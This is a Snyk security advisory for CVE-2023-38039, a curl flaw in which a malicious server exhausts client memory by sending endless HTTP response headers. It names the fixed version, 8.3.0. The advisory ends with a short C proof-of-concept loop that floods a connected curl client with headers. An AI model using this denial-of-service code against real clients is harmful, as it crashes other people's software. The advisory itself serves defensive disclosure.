Allocation of Resources Without Limits or Throttling Affecting curl package, versions [7.84.0,8.3.0)
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Allocation of Resources Without Limits or Throttling vulnerabilities in an interactive lesson.
Start learning- Snyk IDSNYK-UNMANAGED-CURL-5903005
- published15 Sept 2023
- disclosed15 Sept 2023
- creditselmelc
Introduced: 15 Sep 2023
CVE-2023-38039 (opens in a new tab)How to fix?
Upgrade curl to version 8.3.0 or higher.
Overview
curl is a command line tool and library for transferring data with URL syntax, supporting DICT, FILE, FTP, FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP, SFTP, SMB, SMBS, SMTP, SMTPS, TELNET and TFTP. libcurl offers a myriad of powerful features.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when retrieving an HTTP response, storing the incoming headers for later access via its API. Due to not limiting the number or size of headers accepted in a response, a malicious server could stream an endless series of headers and eventually cause the software to run out of heap memory.
PoC
void send_payload(int fd)
{
memset(speedup, 'a', sizeof(speedup));
//first we send the start of a valid HTTP request with status line and a few headers
send(fd, validreq, sizeof(validreq), MSG_MORE);
while (1337)
{
//this is used to speed up the dos process sending extra bytes
send(fd, speedup, sizeof(speedup), MSG_MORE );
//now we're spamming the curl client with the header "a:b" then telling it there's more to come !
send(fd, "a:b\x0d\x0a", 5, MSG_MORE );
}
}